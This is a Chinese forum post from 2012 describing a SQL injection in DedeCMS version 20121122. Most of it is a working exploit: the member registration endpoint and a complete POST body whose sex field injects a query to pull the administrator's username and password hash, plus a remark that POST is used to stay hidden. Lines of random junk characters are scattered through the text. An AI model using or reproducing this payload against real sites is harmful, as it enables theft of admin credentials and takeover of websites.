dedecms版本 20121122
- o8 n. d1 n( Y* U/ X+ Y, \) I' o9 _: M. g
需要magic_quotes_gpc=Off
: J; R% A6 H& j/ j: I7 ^+ ~ ]5 [- m* H" C5 }6 U
应该是没有什么大危害的漏洞.
3 ^* ]% M/ M+ k/ g; K1 Y原来发过一个Dedecms注射漏洞,貌似并没有修补,重新利用了一下,可以获得管理员密码.; z# u' d! O5 X7 k1 V6 E! W
: ?: m1 c4 \; l8 a是一个漏洞.其实不仅仅是审核机制绕过,也可以获得管理员密码的.
, [+ f$ _5 C/ x' m- Q' [; j4 fPOST提交以下数据,其实不用POST提交的,这样隐蔽点.# e: Y1 ]0 _. Q, S, ~! g
! g8 A$ d3 C: z8 @
http:///de/member/reg_new.php9 K& p4 f P; x8 I+ Y
/ F! l' P1 }) J( A2 g) r" n: x1 J
POST
9 a0 Z% y( q. L' U( v. K4 L/ B( s" u X' g/ [$ Q
dopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA&userid=c4rp3nt3r&uname=c4rp3nt3r&userpwd=ssssss&userpwdok=ssssss&email=sss%40ss.ss&safequestion=0&safeanswer=&sex=boy',100,100,'sss@xx.xx',1000,0,'www' and @`'`,(select concat(userid,0x3a,pwd) from `#@__admin` limit 1),0,'',1316751900,'',1316751900,'');%00&vdcode=glos&agree=
+ L8 g" ^7 J/ ]8 Y1 ?/ }: f/ n) C" F; i! R+ ^; i, L7 ~
成功注册后,头像处里面有好玩的信息.
& \; T9 ~+ |" D+ Y! y4 R! ?
: b K% \2 g F& p5 `1 ]. I" c |
发表于 2012-12-5 10:03:32
收藏
支持
反对